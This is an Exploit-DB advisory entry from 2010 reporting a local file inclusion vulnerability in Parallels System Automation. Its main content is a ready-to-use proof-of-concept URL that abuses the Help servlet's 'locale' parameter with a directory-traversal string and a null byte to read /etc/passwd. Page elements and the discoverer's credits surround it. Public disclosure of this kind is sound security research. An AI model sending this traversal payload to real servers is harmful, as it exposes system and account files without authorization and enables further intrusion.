Parallels System Automation (PSA) - Local File Inclusion

EDB-ID:

13833

CVE:

N/A




Platform:

PHP

Date:

2010-06-11


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#################################################################
# Application Info:
# Name: Parallels System Automation (PSA)
# Vendor: http://Parallels.com
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
https://cp.site.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.info
# Contacts: pouya@pouya.info
###################################################################
# Orginal Document:http://blog.pouya.info/userfiles/vul/PSA-LFI.pdf
###################################################################
# Securitylab.ir
###################################################################